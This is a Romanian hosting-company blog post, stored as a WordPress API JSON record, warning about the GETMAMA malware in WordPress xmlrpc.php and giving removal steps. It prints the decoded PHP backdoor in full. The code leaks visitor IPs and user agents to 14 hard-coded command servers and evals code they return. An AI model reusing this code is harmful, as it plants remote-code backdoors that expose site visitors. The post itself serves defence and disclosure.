{"id":297,"date":"2013-02-13T14:02:20","date_gmt":"2013-02-13T12:02:20","guid":{"rendered":"https:\/\/www.clausweb.ro\/blog\/?p=297"},"modified":"2021-09-08T13:35:18","modified_gmt":"2021-09-08T10:35:18","slug":"getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php","status":"publish","type":"post","link":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/","title":{"rendered":"GETMAMA – Un nou virus pe wordpress infecteaza fisierul XMLRPC.php"},"content":{"rendered":"

In lumea bloggerilor a intrat un nou virus numit GETMAMA, nu va lasati indusi in eroare de numele acestuia, este unul dintre cele mai complexe virusuri deoarece este bine codat, ceea ce il face greu de depistat sau de inlaturat. Acesta afecteaza doar unele site-uri web afisand ferestre pop up. Luati aminte, acest virus afecteaza fisierul XMLRPC.php printre altele si doar utilizatorii de Windows. Codul este afisat doar o data pe zi pentru un ip si atunci nu afiseaza la toata lumea codul cu problema.<\/p>\n

Noul virus este descris ca fiind unul \u201cconditional\u201d deoarece, in momentul infectarii acesta trimite informatia inapoi catre atacatori si are optiunea de a infecta un site, de a rula o comanda sau chiar de a nu face nimic. Informatii precum adresa de IP si date despre utilizatorul ce acceseaza site-ul ajung la dezvoltatorii acestui virus, iar acestia pot hotara daca sa afiseze continutul malitios sau nu. Daca acest continut malitios este afisat, acesta va va aparea doar o singura data pe zi, prin intermediul adresei de IP si doar utilizatorilor de Windows.<\/p>\n

Acest virus a fost decodat si expus pe blogul celor de la sucuri.net. Forma decodata nu arata deloc cu forma virusului pe care o veti intalni, aceasta fiind codata pentru a o face mai greu de depistat.<\/p>\n

if\u00a0(!function_exists(„GetMama”)){<\/p>\n

function\u00a0mod_con($buf){str_ireplace(„”,””,$buf,$cnt_h);if\u00a0($cnt_h\u00a0==\u00a01)\u00a0{$buf\u00a0=\u00a0str_ireplace(„”,””\u00a0.\u00a0stripslashes($_SERVER[„good”]),$buf);\u00a0return\u00a0$buf;}str_ireplace(„”,””,$buf,$cnt_h);if\u00a0($cnt_h\u00a0==\u00a01)\u00a0{$buf\u00a0=\u00a0str_ireplace(„”,stripslashes($_SERVER[„good”]).””,$buf);\u00a0return\u00a0$buf;}<\/p>\n

return\u00a0$buf;}function\u00a0opanki($buf){$gz_e\u00a0=\u00a0false;$h_l\u00a0=\u00a0headers_list();if\u00a0(in_array(„Content-Encoding:\u00a0gzip”,\u00a0$h_l))\u00a0{\u00a0$gz_e\u00a0=\u00a0true;}if\u00a0($gz_e){$tmpfname\u00a0=\u00a0tempnam(„\/tmp”,\u00a0„FOO”);file_put_contents($tmpfname,\u00a0$buf);$zd\u00a0=
\ngzopen($tmpfname,\u00a0„r”);$contents\u00a0=\u00a0gzread($zd,\u00a010000000);$contents\u00a0=\u00a0mod_con($contents);gzclose($zd);unlink($tmpfname);$contents\u00a0=\u00a0gzencode($contents);}\u00a0else\u00a0{$contents\u00a0=\u00a0mod_con($buf);}$len\u00a0=\u00a0strlen($contents);header(„Content-Length:\u00a0„.$len);return($contents);}<\/p>\n

function\u00a0GetMama(){$mother\u00a0=\u00a0„compromisedsite.com”;return\u00a0$mother;}<\/p>\n

ob_start(„opanki”);<\/p>\n

function\u00a0ahfudflfzdhfhs($pa){$mama\u00a0=\u00a0GetMama();$file\u00a0=\u00a0urlencode(__FILE__);if\u00a0(isset($_SERVER[„HTTP_HOST”])){$host\u00a0=\u00a0$_SERVER[„HTTP_HOST”];}\u00a0else\u00a0{$host\u00a0=\u00a0„”;}if\u00a0(isset($_SERVER[„REMOTE_ADDR”])){$ip\u00a0=\u00a0$_SERVER[„REMOTE_ADDR”];}\u00a0else\u00a0{$ip\u00a0=\u00a0„”;}if\u00a0(isset($_SERVER[„HTTP_REFERER”])){$ref\u00a0=\u00a0urlencode($_SERVER[„HTTP_REFERER”]);}\u00a0else\u00a0{$ref\u00a0=\u00a0„”;}if\u00a0(isset($_SERVER[„HTTP_USER_AGENT”])){$ua\u00a0=\u00a0urlencode(strtolower($_SERVER[„HTTP_USER_AGENT”]));}\u00a0else\u00a0{$ua\u00a0=\u00a0„”;}if\u00a0(isset($_SERVER[„QUERY_STRING”])){$qs\u00a0=\u00a0urlencode($_SERVER[„QUERY_STRING”]);}\u00a0else\u00a0{$qs\u00a0=\u00a0„”;}<\/p>\n

$url_0\u00a0=\u00a0„http:\/\/”\u00a0.\u00a0$pa;
\n$url_1\u00a0=\u00a0„\/jedi.php?version=0991&mother=”\u00a0.$mama\u00a0.\u00a0„&file=”\u00a0.\u00a0$file\u00a0.\u00a0„&host=”\u00a0.\u00a0$host\u00a0.\u00a0„&ip=”\u00a0.\u00a0$ip\u00a0.\u00a0„&ref=”\u00a0.\u00a0$ref\u00a0.\u00a0„&ua=”\u00a0.$ua\u00a0.\u00a0„&qs=”\u00a0.\u00a0$qs;
\n$try\u00a0=\u00a0true;<\/p>\n

if(\u00a0function_exists(„curl_init”)\u00a0){$ch\u00a0=\u00a0curl_init($url_0\u00a0.\u00a0$url_1);
\ncurl_setopt($ch,\u00a0CURLOPT_RETURNTRANSFER,\u00a01);
\ncurl_setopt($ch,\u00a0CURLOPT_TIMEOUT,\u00a03);
\n$ult\u00a0=\u00a0trim(curl_exec($ch));
\n$try\u00a0=\u00a0false;}<\/p>\n

if\u00a0((ini_get(„allow_url_fopen”))\u00a0&&\u00a0$try)\u00a0{$ult\u00a0=\u00a0trim(@file_get_contents($url_0\u00a0.\u00a0$url_1));$try\u00a0=\u00a0false;}<\/p>\n

if($try){$fp\u00a0=\u00a0fsockopen($pa,\u00a080,\u00a0$errno,\u00a0$errstr,\u00a030);if\u00a0($fp)\u00a0{$out\u00a0=\u00a0„GET\u00a0$url_1\u00a0HTTP\/1.0\\r\\n”;
\n$out\u00a0.=\u00a0„Host:\u00a0$pa\\r\\n”;
\n$out\u00a0.=\u00a0„Connection:\u00a0Close\\r\\n\\r\\n”;
\nfwrite($fp,\u00a0$out);
\n$ret\u00a0=\u00a0„”;
\nwhile\u00a0(!feof($fp))\u00a0{$ret\u00a0\u00a0.=\u00a0\u00a0fgets($fp,\u00a0128);}fclose($fp);$ult\u00a0=\u00a0trim(substr($ret,\u00a0strpos($ret,\u00a0„\\r\\n\\r\\n”)\u00a0+\u00a04));}}<\/p>\n

if\u00a0(strpos($ult,”eval”)\u00a0!==\u00a0false)
\n{
\n$z\u00a0=\u00a0stripslashes(str_replace(„eval”,””,$ult));\u00a0eval($z);\u00a0exit();
\n}
\nif\u00a0(strpos($ult,”ebna”)\u00a0!==\u00a0false){$_SERVER[„good”]\u00a0=\u00a0str_replace(„ebna”,””,$ult);return\u00a0true;}
\nelse\u00a0{return\u00a0false;}}<\/p>\n

$father2[]\u00a0=\u00a0„78.46.173.14”;
\n$father2[]\u00a0=\u00a0„176.9.218.191”;
\n$father2[]\u00a0=\u00a0„91.228.154.254”;
\n$father2[]\u00a0=\u00a0„77.81.241.253”;
\n$father2[]\u00a0=\u00a0„184.82.117.110”;
\n$father2[]\u00a0=\u00a0„46.4.202.93”;
\n$father2[]\u00a0=\u00a0„46.249.58.135”;
\n$father2[]\u00a0=\u00a0„176.9.241.150”;
\n$father2[]\u00a0=\u00a0„46.37.169.56”;
\n$father2[]\u00a0=\u00a0„46.30.41.99”;
\n$father2[]\u00a0=\u00a0„94.242.255.35”;
\n$father2[]\u00a0=\u00a0„178.162.129.223”;
\n$father2[]\u00a0=\u00a0„78.47.184.33”;
\n$father2[]\u00a0=\u00a0„31.184.234.96”;
\nshuffle($father2);
\nforeach($father2\u00a0as\u00a0$ur){if\u00a0(\u00a0ahfudflfzdhfhs($ur)\u00a0)\u00a0{\u00a0break\u00a0;}}}<\/p><\/blockquote>\n

Cam atatea au fost spuse de acest virus, iar in continuare va oferim cateva solutii ce va va ajuta sa scapati de el.Pentru a-l inlatura este indicat verificarea traficului urmatoarelor adrese de IP si, ulterior, blocarea lor.<\/p>\n

78.46.173.14
\n176.9.218.191
\n91.228.154.254
\n77.81.241.253
\n184.82.117.110
\n46.4.202.93
\n46.249.58.135
\n176.9.241.150
\n46.37.169.56
\n46.30.41.99
\n94.242.255.35
\n178.162.129.223
\n78.47.184.33
\n31.184.234.96<\/p>\n

O alta alternativa este oferita pe site-ul edeir.ro si propune urmatoarea solutie, instalarea plugin-ului wordfence ce va efectua o scanare. Daca va depista ca fisierul XMLRPC.php a fost modificat sau oricare alt fisier de la wordpress inseamna ca ati fost infectat de acest virus. Stergeti fisierele respective, cautati ultima versiune de wordpress, in acesta veti gasi toate fisierele orginale care trebuie incarcate pe server. Exista un singur inconvenient, veti pierde orice personalizare facuta, dar veti elimina cu siguranta acest virus, desi exista sanse ca el sa revina daca aveti alte brese de securitate in difeirte teme sau pluginuri instalate.<\/p>\n

Multa bafta in eliminarea virusului!<\/p>\n","protected":false},"excerpt":{"rendered":"

In lumea bloggerilor a intrat un nou virus numit GETMAMA, nu va lasati indusi in eroare de numele acestuia, este unul dintre cele mai complexe virusuri deoarece este bine codat, ceea ce il face greu de depistat sau de inlaturat. Acesta afecteaza doar unele site-uri web afisand ferestre pop up. Luati aminte, acest virus afecteaza Continue reading <\/i><\/a><\/p>\n","protected":false},"author":2,"featured_media":298,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[96],"tags":[7,119,87,118,116,12,117],"class_list":["post-297","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wordpress-2","tag-blog","tag-getmama","tag-hacked","tag-hacker","tag-ip","tag-virus","tag-wp"],"yoast_head":"\nGETMAMA - virus wordpress care afecteaza XMLRPC.php<\/title>\n<meta name=\"description\" content=\"GETMAMA - Un nou virus pe wordpress infecteaza fisierul XMLRPC.php O noua vulnerabilitate in fisierul xmlrpc.php\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/\" \/>\n<meta property=\"og:locale\" content=\"ro_RO\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"GETMAMA - virus wordpress care afecteaza XMLRPC.php\" \/>\n<meta property=\"og:description\" content=\"GETMAMA - Un nou virus pe wordpress infecteaza fisierul XMLRPC.php O noua vulnerabilitate in fisierul xmlrpc.php\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/\" \/>\n<meta property=\"og:site_name\" content=\"Blog CLAUS WEB\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/clausweb\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/clausweb\" \/>\n<meta property=\"article:published_time\" content=\"2013-02-13T12:02:20+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-09-08T10:35:18+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.clausweb.ro\/blog\/wp-content\/uploads\/2013\/02\/hacked-WP.png\" \/>\n\t<meta property=\"og:image:width\" content=\"538\" \/>\n\t<meta property=\"og:image:height\" content=\"313\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Claudiu Cadar\" \/>\n<meta name=\"twitter:label1\" content=\"Scris de\" \/>\n\t<meta name=\"twitter:data1\" content=\"Claudiu Cadar\" \/>\n\t<meta name=\"twitter:label2\" content=\"Timp estimat pentru citire\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/\"},\"author\":{\"name\":\"Claudiu Cadar\",\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/#\\\/schema\\\/person\\\/3a41735b23305c78338eb6e090fe9222\"},\"headline\":\"GETMAMA – Un nou virus pe wordpress infecteaza fisierul XMLRPC.php\",\"datePublished\":\"2013-02-13T12:02:20+00:00\",\"dateModified\":\"2021-09-08T10:35:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/\"},\"wordCount\":735,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/wp-content\\\/uploads\\\/2013\\\/02\\\/hacked-WP.png\",\"keywords\":[\"blog\",\"GETMAMA\",\"Hacked\",\"hacker\",\"IP\",\"virus\",\"wp\"],\"articleSection\":[\"Wordpress\"],\"inLanguage\":\"ro-RO\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/\",\"url\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/\",\"name\":\"GETMAMA - virus wordpress care afecteaza XMLRPC.php\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/wp-content\\\/uploads\\\/2013\\\/02\\\/hacked-WP.png\",\"datePublished\":\"2013-02-13T12:02:20+00:00\",\"dateModified\":\"2021-09-08T10:35:18+00:00\",\"description\":\"GETMAMA - Un nou virus pe wordpress infecteaza fisierul XMLRPC.php O noua vulnerabilitate in fisierul xmlrpc.php\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/#breadcrumb\"},\"inLanguage\":\"ro-RO\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ro-RO\",\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/wp-content\\\/uploads\\\/2013\\\/02\\\/hacked-WP.png\",\"contentUrl\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/wp-content\\\/uploads\\\/2013\\\/02\\\/hacked-WP.png\",\"width\":538,\"height\":313},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Acasa\",\"item\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"GETMAMA – Un nou virus pe wordpress infecteaza fisierul XMLRPC.php\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/\",\"name\":\"Blog CLAUS WEB\",\"description\":\"Totul despre gazduire, inregistrare domenii, servere dedicate, securitate pe net\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ro-RO\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/#organization\",\"name\":\"Claus Web SRL\",\"url\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ro-RO\",\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/wp-content\\\/uploads\\\/2013\\\/06\\\/logoClausWeb.png\",\"contentUrl\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/wp-content\\\/uploads\\\/2013\\\/06\\\/logoClausWeb.png\",\"width\":318,\"height\":195,\"caption\":\"Claus Web SRL\"},\"image\":{\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/clausweb\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.clausweb.ro\\\/blog\\\/#\\\/schema\\\/person\\\/3a41735b23305c78338eb6e090fe9222\",\"name\":\"Claudiu Cadar\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ro-RO\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/16c4581e5d7b7adfbfd4714274e11b05312c77d1e2df6842bc4cd00289097ca4?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/16c4581e5d7b7adfbfd4714274e11b05312c77d1e2df6842bc4cd00289097ca4?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/16c4581e5d7b7adfbfd4714274e11b05312c77d1e2df6842bc4cd00289097ca4?s=96&d=mm&r=g\",\"caption\":\"Claudiu Cadar\"},\"sameAs\":[\"http:\\\/\\\/www.clauswebkennel.eu\\\/\",\"https:\\\/\\\/www.facebook.com\\\/clausweb\",\"https:\\\/\\\/x.com\\\/clausweb\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"GETMAMA - virus wordpress care afecteaza XMLRPC.php","description":"GETMAMA - Un nou virus pe wordpress infecteaza fisierul XMLRPC.php O noua vulnerabilitate in fisierul xmlrpc.php","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/","og_locale":"ro_RO","og_type":"article","og_title":"GETMAMA - virus wordpress care afecteaza XMLRPC.php","og_description":"GETMAMA - Un nou virus pe wordpress infecteaza fisierul XMLRPC.php O noua vulnerabilitate in fisierul xmlrpc.php","og_url":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/","og_site_name":"Blog CLAUS WEB","article_publisher":"https:\/\/www.facebook.com\/clausweb","article_author":"https:\/\/www.facebook.com\/clausweb","article_published_time":"2013-02-13T12:02:20+00:00","article_modified_time":"2021-09-08T10:35:18+00:00","og_image":[{"width":538,"height":313,"url":"https:\/\/www.clausweb.ro\/blog\/wp-content\/uploads\/2013\/02\/hacked-WP.png","type":"image\/png"}],"author":"Claudiu Cadar","twitter_misc":{"Scris de":"Claudiu Cadar","Timp estimat pentru citire":"3 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/#article","isPartOf":{"@id":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/"},"author":{"name":"Claudiu Cadar","@id":"https:\/\/www.clausweb.ro\/blog\/#\/schema\/person\/3a41735b23305c78338eb6e090fe9222"},"headline":"GETMAMA – Un nou virus pe wordpress infecteaza fisierul XMLRPC.php","datePublished":"2013-02-13T12:02:20+00:00","dateModified":"2021-09-08T10:35:18+00:00","mainEntityOfPage":{"@id":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/"},"wordCount":735,"commentCount":0,"publisher":{"@id":"https:\/\/www.clausweb.ro\/blog\/#organization"},"image":{"@id":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/#primaryimage"},"thumbnailUrl":"https:\/\/www.clausweb.ro\/blog\/wp-content\/uploads\/2013\/02\/hacked-WP.png","keywords":["blog","GETMAMA","Hacked","hacker","IP","virus","wp"],"articleSection":["Wordpress"],"inLanguage":"ro-RO","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/","url":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/","name":"GETMAMA - virus wordpress care afecteaza XMLRPC.php","isPartOf":{"@id":"https:\/\/www.clausweb.ro\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/#primaryimage"},"image":{"@id":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/#primaryimage"},"thumbnailUrl":"https:\/\/www.clausweb.ro\/blog\/wp-content\/uploads\/2013\/02\/hacked-WP.png","datePublished":"2013-02-13T12:02:20+00:00","dateModified":"2021-09-08T10:35:18+00:00","description":"GETMAMA - Un nou virus pe wordpress infecteaza fisierul XMLRPC.php O noua vulnerabilitate in fisierul xmlrpc.php","breadcrumb":{"@id":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/#breadcrumb"},"inLanguage":"ro-RO","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/"]}]},{"@type":"ImageObject","inLanguage":"ro-RO","@id":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/#primaryimage","url":"https:\/\/www.clausweb.ro\/blog\/wp-content\/uploads\/2013\/02\/hacked-WP.png","contentUrl":"https:\/\/www.clausweb.ro\/blog\/wp-content\/uploads\/2013\/02\/hacked-WP.png","width":538,"height":313},{"@type":"BreadcrumbList","@id":"https:\/\/www.clausweb.ro\/blog\/getmama-un-nou-virus-pe-wordpress-infecteaza-fisierul-xmlprc-php\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Acasa","item":"https:\/\/www.clausweb.ro\/blog\/"},{"@type":"ListItem","position":2,"name":"GETMAMA – Un nou virus pe wordpress infecteaza fisierul XMLRPC.php"}]},{"@type":"WebSite","@id":"https:\/\/www.clausweb.ro\/blog\/#website","url":"https:\/\/www.clausweb.ro\/blog\/","name":"Blog CLAUS WEB","description":"Totul despre gazduire, inregistrare domenii, servere dedicate, securitate pe net","publisher":{"@id":"https:\/\/www.clausweb.ro\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.clausweb.ro\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ro-RO"},{"@type":"Organization","@id":"https:\/\/www.clausweb.ro\/blog\/#organization","name":"Claus Web SRL","url":"https:\/\/www.clausweb.ro\/blog\/","logo":{"@type":"ImageObject","inLanguage":"ro-RO","@id":"https:\/\/www.clausweb.ro\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.clausweb.ro\/blog\/wp-content\/uploads\/2013\/06\/logoClausWeb.png","contentUrl":"https:\/\/www.clausweb.ro\/blog\/wp-content\/uploads\/2013\/06\/logoClausWeb.png","width":318,"height":195,"caption":"Claus Web SRL"},"image":{"@id":"https:\/\/www.clausweb.ro\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/clausweb"]},{"@type":"Person","@id":"https:\/\/www.clausweb.ro\/blog\/#\/schema\/person\/3a41735b23305c78338eb6e090fe9222","name":"Claudiu Cadar","image":{"@type":"ImageObject","inLanguage":"ro-RO","@id":"https:\/\/secure.gravatar.com\/avatar\/16c4581e5d7b7adfbfd4714274e11b05312c77d1e2df6842bc4cd00289097ca4?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/16c4581e5d7b7adfbfd4714274e11b05312c77d1e2df6842bc4cd00289097ca4?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16c4581e5d7b7adfbfd4714274e11b05312c77d1e2df6842bc4cd00289097ca4?s=96&d=mm&r=g","caption":"Claudiu Cadar"},"sameAs":["http:\/\/www.clauswebkennel.eu\/","https:\/\/www.facebook.com\/clausweb","https:\/\/x.com\/clausweb"]}]}},"_links":{"self":[{"href":"https:\/\/www.clausweb.ro\/blog\/wp-json\/wp\/v2\/posts\/297","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.clausweb.ro\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.clausweb.ro\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.clausweb.ro\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.clausweb.ro\/blog\/wp-json\/wp\/v2\/comments?post=297"}],"version-history":[{"count":0,"href":"https:\/\/www.clausweb.ro\/blog\/wp-json\/wp\/v2\/posts\/297\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.clausweb.ro\/blog\/wp-json\/wp\/v2\/media\/298"}],"wp:attachment":[{"href":"https:\/\/www.clausweb.ro\/blog\/wp-json\/wp\/v2\/media?parent=297"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.clausweb.ro\/blog\/wp-json\/wp\/v2\/categories?post=297"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.clausweb.ro\/blog\/wp-json\/wp\/v2\/tags?post=297"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}